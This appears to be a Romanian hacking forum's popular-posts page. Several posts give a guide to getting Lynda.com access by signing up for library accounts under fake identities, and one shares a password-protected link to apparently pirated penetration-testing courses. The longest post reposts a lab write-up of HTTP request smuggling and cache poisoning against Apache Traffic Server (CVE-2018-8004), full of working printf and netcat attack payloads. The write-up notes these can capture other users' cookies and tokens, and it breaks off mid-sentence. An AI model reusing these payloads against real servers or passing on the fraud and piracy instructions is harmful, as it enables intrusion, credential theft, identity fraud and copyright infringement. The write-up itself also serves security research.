Jump to content


Popular Content

Showing content with the highest reputation since 09/21/19 in Posts

  1. 4 points
    Cand o sa am timp o sa fac curatenie (fara sa mai tin cont de vechimea si utilitatea userilor care fac caterinca si injura). Desi nu e cea mai buna intrebare, dati voi dovada de inteligenta si oferiti un raspuns din care sa inteleaga cum functioneaza lucrurile.
  2. 3 points
    A technique to evade Content Security Policy (CSP) leaves surfers using the latest version of Firefox vulnerable to cross-site scripting (XSS) exploits. Researcher Matheus Vrech uncovered a full-blown CSP bypass in the latest version of Mozilla’s open source web browser that relies on using an object tag attached to a data attribute that points to a JavaScript URL. The trick allows potentially malicious content to bypass the CSP directive that would normally prevent such objects from being loaded. Vrech developed proof-of-concept code that shows the trick working in the current version of Firefox (version 69). The Daily Swig was able to confirm that the exploit worked. The latest beta versions of Firefox are not vulnerable, as Vrech notes. Chrome, Safari, and Edge are unaffected. If left unaddressed, the bug could make it easier to execute certain XSS attacks that would otherwise be foiled by CSP. The Daily Swig has invited Mozilla to comment on Vrech’s find, which he is hoping will earn recognition under the software developer’s bug bounty program. The researcher told The Daily Swig about how he came across the vulnerability. “I was playing ctf [capture the flag] trying to bypass a CSP without object-src CSP rule and testing some payloads I found this non intended (by anyone) way,” he explained. “About the impact: everyone that was stuck in a bug bounty XSS due to CSP restrictions should have reported it by this time.” Content Security Policy is a technology set by websites and used by browsers that can block external resources and prevent XSS attacks. PortSwigger researcher Gareth Heyes discussed this and other aspect of browser security at OWASP’s flagship European event late last month. Sursa: https://portswigger.net/daily-swig/firefox-vulnerable-to-trivial-csp-bypass
  3. 3 points
    Sursa Financial Times. La revedere cryptografie asa cum o stim? ...
  4. 3 points
    also 🤣🤣🤣🤣🤣🤣hahahahahahahahahahahahahahahaha
  5. 2 points
    1. Intrati pe Cuyahoga County Public Library 2. Click pe "My Account" si apoi "Create Account" 2. Deschideti Fake Name Generator 3. Introduceti datele de pe Fake Name Generator in contul de Cuyahoga Library, cu doua mentiuni: puneti cod postal de Ohio si adresa de e-mail la care sa aveti acces. 4. Intrati pe E-Mail si copiati Acces Number-ul, dupa care va logati pe Cuyahoga County Public Library, introduceti doar Acces Number-ul, dupa care va pune sa va creati un PIN Number format din 4 cifre. 5. Intrati pe Lynda.com, selectati "Sign In", dupa care selectati "Sign in with your organization portal". Acolo introduceti link-ul de la librarie, dupa care Acces Number-ul si PIN-ul pe care tocmai vi l-ati ales. Si gata, aveti cont. Daca aveti intrebari, intrebati-ma in mod inteligent. Daca stiati deja asta, puteti sari peste topic. Nu stiu cat dureaza chestia asta, insa chiar si o luna daca aveti acces, este ok. Va ia maxim 5 minute sa creati tot ceea ce am explicat mai sus. Hai bafta. EDIT: Nu numai la Cuyahoga Library merge. Puteti intra pe Free Library si va alegeti de acolo o librarie, insa una care sa emita card online. Cu tot cu AN si PIN.
  6. 2 points
    Sudo Flaw Lets Linux Users Run Commands As Root Even When They're Restricted Attention Linux Users! A new vulnerability has been discovered in Sudo—one of the most important, powerful, and commonly used utilities that comes as a core command installed on almost every UNIX and Linux-based operating system. The vulnerability in question is a sudo security policy bypass issue that could allow a malicious user or a program to execute arbitrary commands as root on a targeted Linux system even when the "sudoers configuration" explicitly disallows the root access. Sudo, stands for "superuser do," is a system command that allows a user to run applications or commands with the privileges of a different user without switching environments—most often, for running commands as the root user. By default on most Linux distributions, the ALL keyword in RunAs specification in /etc/sudoers file, as shown in the screenshot, allows all users in the admin or sudo groups to run any command as any valid user on the system. Reference Link : https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html?fbclid=IwAR1V9EZDp75uQdBgcQxV4t4C0THHguOtNkIk7o1PfapQPJEt9FaZmFK58Mg
  7. 2 points
    Odata intrat acolo nu mai e scapare sa stii.Am supravietuit doar o saptamana pe acolo :)))
  8. 2 points
    Consola de jocuri retro bazata pe Raspberry Pi 3 Model B - Carcasa Kintaro Super Kuma 9000, cu buton de Power on/off, buton de reset, ventilator - Raspberry Pi 3 Model B, cu card SD 16GB Toshiba - Incarcator 3A 5V bun, care nu subvolteaza Butoanele sunt functionale ambele. Carcasa are ventilator instalat, care functioneaza cand placa este solicitata, am folosit inclusiv Arctic MX-4 pentru temperaturi mai bune. Pe cardul SD am instalat Retropie si ROM-uri pentru diverse emulatoare. Practic sistemul are tot ce va trebuie pe el pentru a juca. Pret: 200 RON
  9. 2 points
  10. 2 points
    Are probleme cu serverul de NTP
  11. 2 points
  12. 2 points
    Mi-a cerut un service 80 ron, mi-am bagat pula in mortii lui, in 3, 4, 5h il rezolvi, si ramai cu banii de senvici si tigari si bere, incearca pe https://forum.xda-developers.com/
  13. 1 point
  14. 1 point
    Da frate @SynTAX bine ca m-ai atentionat, uite @adytzu123456, am un cod de invitatie pus cu hidden sa nu vada cei neinregistrati, sa il folosesti ca expira in 24h.
  15. 1 point
    @aismen vezi ca vrea omu invitatie. Parca tu aveai.
  16. 1 point
  17. 1 point
    1- Web Application Penetration Testing eXtreme (eWPTX ) ---------------------------------------------------- 03. Website_cloning.mp4 03. From_An_XSS_To_A_SQL_Injection.mp4 03. Keylogging.mp4 09. Advanced XXE Exploitation.MP4 07. Advanced_SecondOrder_SQL_Injection_Exploitation.mp4 05. Advanced_XSRF_Exploitation_part_i.mp4 06. Advanced_XSRF_Exploitation_part_ii.mp4 09. Advanced_Xpath_Exploitation.mp4 WAPTx sec 9.pdf WAPTx sec 8.pdf WAPTx sec 2.pdf WAPTx sec 3.pdf WAPTx sec 5.pdf WAPTx sec 6.pdf WAPTx sec 4.pdf WAPTx sec 7.pdf WAPTx sec 1.pdf 2- Penetration Testing Professional (ePTPv3) 3- Web Application Penetration Testing (eWAPT v2) ---------------------------------------------------- Penetration Testing Process Introduction Information Gathering Cross Site Scripting SQL Injection Authentication and Authorization Session Security HTML5 File and Resources Attacks Other Attacks Web Services XPath https://mega.nz/#!484ByQRa!N7-wnQ3t5pMCavOvzh8-xMiMKSD2RARozRM99v17-8I Pass: P8@Hu%vbg_&{}/2)p+4T Sursa:
  18. 1 point
    Security: HTTP Smuggling, Apache Traffic Server Sept 17, 2019 english and security details of CVE-2018-8004 (August 2018 - Apache Traffic Server). What is this about ? Apache Traffic Server ? Fixed versions of ATS CVE-2018-8004 Step by step Proof of Concept Set-up the lab: Docker instances Test That Everything Works Request Splitting by Double Content-Length Request Splitting by NULL Character Injection Request Splitting using Huge Header, Early End-Of-Query Cache Poisoning using Incomplete Queries and Bad Separator Prefix Attack schema HTTP Response Splitting: Content-Length Ignored on Cache Hit Attack schema Timeline See also English version (Version Française disponible sur makina corpus). estimated read time: 15 min to really more What is this about ? This article will give a deep explanation of HTTP Smuggling issues present in CVE-2018-8004. Firstly because there's currently not much informations about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly some time has passed since the official announce (and even more since the availability of fixs in v7), also mostly because I keep receiving demands on what exactly is HTTP Smuggling and how to test/exploit this type of issues, also beacause Smuggling issues are now trending and easier to test thanks for the great stuff of James Kettle (@albinowax). So, this time, I'll give you not only details but also a step by step demo with some DockerFiles to build your own test lab. You could use that test lab to experiment it with manual raw queries, or test the recently added BURP Suite Smuggling tools. I'm really a big partisan of always searching for Smuggling issues in non production environements, for legal reasons and also to avoid unattended consequences (and we'll see in this article, with the last issue, that unattended behaviors can always happen). Apache Traffic Server ? Apache Traffic Server, or ATS is an Open Source HTTP load balancer and Reverse Proxy Cache. Based on a Commercial product donated to the Apache Foundation. It's not related to Apache httpd HTTP server, the "Apache" name comes from the Apache foundation, the code is very different from httpd. If you were to search from ATS installations on the wild you would find some, hopefully fixed now. Fixed versions of ATS As stated in the CVE announce (2018-08-28) impacted ATS versions are versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released in 2018-08-02 and 6.2.3 in 2018-08-04. That's the offical announce, but I think 7.1.3 contained most of the fixs already, and is maybe not vulnerable. The announce was mostly delayed for 6.x backports (and some other fixs are relased in the same time, on other issues). If you wonder about previous versions, like 5.x, they're out of support, and quite certainly vulnerable. Do not use out of support versions. CVE-2018-8004 The official CVE description is: There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS. Which does not gives a lot of pointers, but there's much more information in the 4 pull requests listed: #3192: Return 400 if there is whitespace after the field name and before the colon #3201: Close the connection when returning a 400 error response #3231: Validate Content-Length headers for incoming requests #3251: Drain the request body if there is a cache hit If you already studied some of my previous posts, some of these sentences might already seems dubious. For example not closing a response stream after an error 400 is clearly a fault, based on the standards, but is also a good catch for an attacker. Chances are that crafting a bad messages chain you may succeed at receiving a response for some queries hidden in the body of an invalid request. The last one, Drain the request body if there is a cache hit is the nicest one, as we will see on this article, and it was hard to detect. My original report listed 5 issues: HTTP request splitting using NULL character in header value HTTP request splitting using huge header size HTTP request splitting using double Content-length headers HTTP cache poisoning using extra space before separator of header name and header value HTTP request splitting using ...(no spoiler: I keep that for the end) Step by step Proof of Concept To understand the issues, and see the effects, We will be using a demonstration/research environment. If you either want to test HTTP Smuggling issues you should really, really, try to test it on a controlled environment. Testing issues on live environments would be difficult because: You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your success and errors. You may triggers errors and behaviors that you have no idea about, for example I have encountered random errors on several fuzzing tests (on test envs), unreproductible, before understanding that this was related to the last smuggling issue we will study on this article. Effects were delayed on subsequent tests, and I was not in control, at all. You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self reflected XSS, you could end up in a court for that. Real life complete examples usually occurs with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Nodejs, etc. You will have to understand how each actor interact with the other, and you will see it faster with a local low level network capture than blindly accross an unknown chain of agents (like for example to learn how to detect each agent on this chain). So it's very important to be able to rebuild a laboratory env. And, if you find something, this env can then be used to send detailled bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues, a working demo helps). Set-up the lab: Docker instances We will run 2 Apache Traffic Server Instance, one in version 6.x and one in version 7.x. To add some alterity, and potential smuggling issues, we will also add an Nginx docker, and an HaProy one. 4 HTTP actors, each one on a local port: : HaProxy (internally listening on port 80) : Nginx (internally listening on port 80) : ATS7 (internally listening on port 8080) : ATS6 (internally listening on port 8080), most examples will use ATS7, but you will ba able to test this older version simply using this port instead of the other (and altering the domain). We will chain some Reverse Proxy relations, Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6) Note that the localhost port mapping of the ATS and Nginx instances are not directly needed, if you can inject a request to Haproxy it will reach Nginx internally, via port 8080 of one of the ATS, and port 80 of Nginx. But that could be usefull if you want to target directly one of the server, and we will have to avoid the HaProxy part on most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to suceed targeting 8001, that will be harder. +---[80]---+ | 8001->80 | | HaProxy | | | +--+---+---+ [dummy-host6.example.com] | | [dummy-host7.example.com] +-------+ +------+ | | +-[8080]-----+ +-[8080]-----+ | 8006->8080 | | 8007->8080 | | ATS6 | | ATS7 | | | | | +-----+------+ +----+-------+ | | +-------+-------+ | +--[80]----+ | 8002->80 | | Nginx | | | +----------+ To build this cluster we will use docker-compose, You can the find the docker-compose.yml file here, but the content is quite short: version: '3' services: haproxy: image: haproxy:1.6 build: context: . dockerfile: Dockerfile-haproxy expose: - 80 ports: - "8001:80" links: - ats7:linkedats7.net - ats6:linkedats6.net depends_on: - ats7 - ats6 ats7: image: centos:7 build: context: . dockerfile: Dockerfile-ats7 expose: - 8080 ports: - "8007:8080" depends_on: - nginx links: - nginx:linkednginx.net ats6: image: centos:7 build: context: . dockerfile: Dockerfile-ats6 expose: - 8080 ports: - "8006:8080" depends_on: - nginx links: - nginx:linkednginx.net nginx: image: nginx:latest build: context: . dockerfile: Dockerfile-nginx expose: - 80 ports: - "8002:80" To make this work you will also need the 4 specific Dockerfiles: Docker-haproxy: an HaProxy Dockerfile, with the right conf Docker-nginx: A very simple Nginx Dockerfile with one index.html page Docker-ats7: An ATS 7.1.1 compiled from archive Dockerfile Docker-ats6: An ATS 6.2.2 compiled from archive Dockerfile Put all theses files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir: docker-compose build && docker-compose up You can now take a big break, you are launching two compilations of ATS. Hopefully the next time a up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element on the cluster, to test fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions. Test That Everything Works We will run basic non attacking queries on this installation, to check that everything is working, and to train ourselves on the printf + netcat way of running queries. We will not use curl or wget to run HTTP query, because that would be impossible to write bad queries. So we need to use low level string manipulations (with printf for example) and socket handling (with netcat -- or nc --). Test Nginx (that's a one-liner splitted for readability): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 8002 You should get the index.html response, something like: HTTP/1.1 200 OK Server: nginx/1.15.5 Date: Fri, 26 Oct 2018 15:28:20 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT Connection: keep-alive ETag: "5bd321bc-78" X-Location-echo: / X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Then test ATS7 and ATS6: printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 8007 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 8006 Then test HaProxy, altering the Host name should make the transit via ATS7 or ATS6 (check the Server: header response): printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ | nc 8001 printf 'GET / HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 8001 And now let's start a more complex HTTP stuff, we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks: # send one pipelined chain of queries printf 'GET /?cache=1 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=2 HTTP/1.1\r\n'\ 'Host:dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /?cache=3 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ 'GET /?cache=4 HTTP/1.1\r\n'\ 'Host:dummy-host6.example.com\r\n'\ '\r\n'\ | nc 8001 This is pipelining, it's not only using HTTP keepAlive, because we send the chain of queries without waiting for the responses. See my previous post for detail on Keepalives and Pipelining. You should get the Nginx access log on the docker-compose output, if you do not rotate some arguments in the query nginx wont get reached by your requests, because ATS is caching the result already (CTRL+C on the docker-compose output and docker-compose up will remove any cache). Request Splitting by Double Content-Length Let's start a real play. That's the 101 of HTTP Smuggling. The easy vector. Double Content-Length header support is strictly forbidden by the RFC 7230 3.3.3 (bold added): 4 If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response. Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005). Sending such query directly on ATS generates 2 responses (one 400 and one 200): printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Content-Length: 0\r\n'\ 'Content-Length: 66\r\n'\ '\r\n'\ 'GET /index.html?toto=2 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 8007 The regular response should be one error 400. Using port 8001 (HaProxy) would not work, HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is Critical Request Splitting, classical, but hard to reproduce in real life environment if some robust tools are used on the reverse proxy chain. So, why critical? Because you could also consider ATS to be robust, and use a new unknown HTTP server behind or in front of ATS and expect such smuggling attacks to be properly detected. And there is another factor of criticality, any other issue on HTTP parsing can exploit this Double Content-Length. Let's say you have another issue which allows you to hide one header for all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-length and you're done, without being blocked by a previous actor. On our current case, ATS, you have one example of such hidden-header issue with the 'space-before-:' that we will analyze later. Request Splitting by NULL Character Injection This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after), that's also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character. Using a NULL byte character in a header triggers a query rejection on ATS, that's ok, but also a premature end of query, and if you do not close pipelines after a first error, bad things could happen. Next line is interpreted as next query in pipeline. So, a valid (almost, if you except the NULL character) pipeline like this one: 01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 X-Foo: Bar\r\n 04 \r\n 05 GET /index.html?bar=1 HTTP/1.1\r\n 06 Host: dummy-host7.example.com\r\n 07 \r\n Generates 2 error 400. because the second query is starting with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there'is no \r\n between the 2 queries): 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 GET /index.html?bar=2 HTTP/1.1\r\n 04 Host: dummy-host7.example.com\r\n 05 \r\n It generates 1 error 400 and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request Splitting attack. But line 03 is a really bad header line that most agent would reject. You cannot read that as a valid unique query. The fake pipeline would be detected early as a bad query, I mean line 03 is clearly not a valid header line. GET /index.html?bar=2 HTTP/1.1\r\n != <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF] For the first line the syntax is one of these two lines: <METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF] <METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri) LOCATION may be used to inject the special [:] that is required in an header line, especially on the query string part, but this would inject a lot of bad characters in the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try with the ABSOLUTE-URI alternative syntax, where the [:] comes faster on the line, and the only bad character for an Header name would be the space. This will also fix the potential presence of the double Host header (absolute uri does replace the Host header). 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 X-Something: \0 something\r\n 04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n 05 \r\n Here the bad header which becomes a query is line 04, and the header name is GET http with an header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space) but I'm pretty sure we could find some HTTP agent transferring this header (ATS is one proof of that, space character in header names were allowed). A real attack using this trick will looks like this: printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-Something: "\0something"\r\n'\ 'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\ '\r\n'\ 'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 8007 This is just 2 queries (1st one has 2 bad header, one with a NULL, one with a space in header name), for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: added by Nginx. After that ATS adds a thirsr response, a 404, but the previous actor expects only 2 responses, and the second response is already replaced. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:34:53 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> Then: HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replacing=1&zorg=2 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> And then the extra unused response: HTTP/1.1 404 Not Found Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 153 Age: 0 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.15.5</center> </body> </html> If you try to use port 8001 (so transit via HaProxy) you will not get the expected attacking result. That attacking query is really too bad. HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html <html><body><h1>400 Bad request</h1> Your browser sent an invalid request. </body></html> That's an HTTP request splitting attack, but real world usage may be hard to find. The fix on ATS is the 'close on error', when an error 400 is triggered the pipelined is stopped, the socket is closed after the error. Request Splitting using Huge Header, Early End-Of-Query This attack is almost the same as the previous one, but do not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way than the with the NULL premature end of query. A note on printf huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1 for example): X: ==============( 65 532 '=' )========================\r\n You can use the %ns form in printf to generate this, generating big number of spaces. But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string: printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " " Try it against Nginx : printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65532s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 8002 I gat one error 400, that's the normal stuff. It Nginx does not like huge headers. Now try it against ATS7: printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65534s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 8007 And after the error 400 we have a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header but we do not have the NULL character. But, yeah, 65000 character is very big, most actors would reject a query after 8000 characters on one line. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:40:17 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:40:17 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replaced=0&cache=8 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Cache Poisoning using Incomplete Queries and Bad Separator Prefix Cache poisoning, that's sound great. On smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why splitted pipelines are dangerous. ATS support an invalid header Syntax: HEADER[SPACE]:HEADER VALUE\r\n That's not conform to RFC7230 section 3.3.2: Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace. So : HEADER:HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n => OK HEADER[SPACE]:HEADER_VALUE\r\n => NOT OK And RFC7230 section 3.2.4 adds (bold added): No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream. ATS will interpret the bad header, and also forward it without alterations. Using this flaw we can add some headers in our request that are invalid for any valid HTTP agents but still interpreted by ATS like: Content-Length :77\r\n Or (try it as an exercise) Transfer-encoding :chunked\r\n Some HTTP servers will effectively reject such message with an error 400. But some will simply ignore the invalid header. That's the case of Nginx for example. ATS will maintain a keep-alive connection to the Nginx Backend, so we'll use this ignored header to transmit a body (ATS think it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a crlf on end-of-header) to absorb a future query sent to Nginx. This sort of incomplete-query filled by the next coming query is also a basic Smuggling technique demonstrated 13 years ago. 01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-Control: max-age=200\r\n 04 X-info: evil 1.5 query, bad CL header\r\n 05 Content-Length :117\r\n 06 \r\n 07 GET /index.html?INJECTED=1 HTTP/1.1\r\n 08 Host: dummy-host7.example.com\r\n 09 X-info: evil poisoning query\r\n 10 Dummy-incomplete: Line 05 is invalid (' :'). But for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS transmitted to backend. For Nginx: Line 05 is ignored. Line 07 is a new request (and first response is returned). Line 10 has no "\r\n". so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ... Attack schema [ATS Cache poisoning - space before header separator + backend ignoring bad headers] Innocent Attacker ATS Nginx | | | | | |--A(1A+1/2B)-->| | * Issue 1 & 2 * | | |--A(1A+1/2B)-->| * Issue 3 * | | |<-A(404)-------| | | | [1/2B] | |<-A(404)-------| [1/2B] | |--C----------->| [1/2B] | | |--C----------->| * ending B * | | [*CP*]<--B(200)----| | |<--B(200)------| | |--C--------------------------->| | |<--B(200)--------------------[HIT] | 1A + 1/2B means request A + an incomplete query B A(X) : means X query is hidden in body of query A CP : Cache poisoning Issue 1 : ATS transmit 'header[SPACE]: Value', a bad HTTP header. Issue 2 : ATS interpret this bad header as valid (so 1/2B still hidden in body) Issue 3 : Nginx encounter the bad header but ignore the header instead of sending an error 400. So 1/2B is discovered as a new query (no Content-length) request B contains an incomplete header (no crlf) ending B: the 1st line of query C ends the incomplete header of query B. all others headers are added to the query. C disappears and mix C HTTP credentials with all previous B headers (cookie/bearer token/Host, etc.) Instead of cache poisoning you could also play with the incomplete 1/B query and wait for the Innocent query to finish this request with HTTP credentials of this user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning. Run this attack: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ 'X-info: evil 1.5 query, bad CL header\r\n'\ 'Content-Length :117\r\n'\ '\r\n'\ 'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-info: evil poisoning query\r\n'\ 'Dummy-unterminated:'\ |nc -q 1 8007 done It should work, Nginx adds an X-Location-echo header in this lab configuration, where we have the first line of the query added on the response headers. This way we can observe that the second response is removing the real second query first line and replacing it with the hidden first line. On my case the last query response contained: X-Location-echo: /index.html?INJECTED=3 But this last query was GET /index.html?INJECTED=9. You can check the cache content with: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 8007 done In my case I found 6 404 (regular) and 3 200 responses (ouch), the cache is poisoned. If you want to go deeper in Smuggling understanding you should try to play with wireshark on this example. Do not forget to restart the cluster to empty the cache. Here we did not played with a C query yet, the cache poisoning occurs on our A query. Unless you consider the /does-not-exists.html?cache='$i' as C queries. But you can easily try to inject a C query on this cluster, where Nginx as some waiting requests, try to get it poisoned with /index.html?INJECTED=3 responses: for i in {1..9} ;do printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 8007 done This may give you a touch on real world exploitations, you have to repeat the attack to obtain something. Vary the number of servers on the cluster, the pools settings on the various layers of reverse proxies, etc. Things get complex. The easiest attack is to be a chaos generator (defacement like or DOS), fine cache replacement of a target on the other hand requires fine study and a bit of luck. Does this work on port 8001 with HaProxy? well, no, of course. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue, to hide this bad request in a body. Or you would need a load balancer which does not detect this invalid syntax. Note that in this example the nginx behavior on invalid header syntax (ignore it) is also not standard (and wont be fixed, AFAIK). This invalid space prefix problem is the same issue as Apache httpd in CVE-2016-8743. HTTP Response Splitting: Content-Length Ignored on Cache Hit Still there? Great! Because now is the nicest issue. At least for me it was the nicest issue. Mainly because I've spend a lot of time around it without understanding it. I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce I had failures, and success on previoulsy undetected issues, and back to step1. Issues you cannot reproduce, you start doubting that you saw it before. Suddenly you find it back, but then no, etc. And of course I was not searching the root cause on the right examples. I was for example triggering tests on bad chunked transmissions, or delayed chunks. It was very a long (too long) time before I detected that all this was linked to the cache hit/cache miss status of my requests. On cache Hit Content-Length header on a GET query is not read. That's so easy when you know it... And exploitation is also quite easy. We can hide 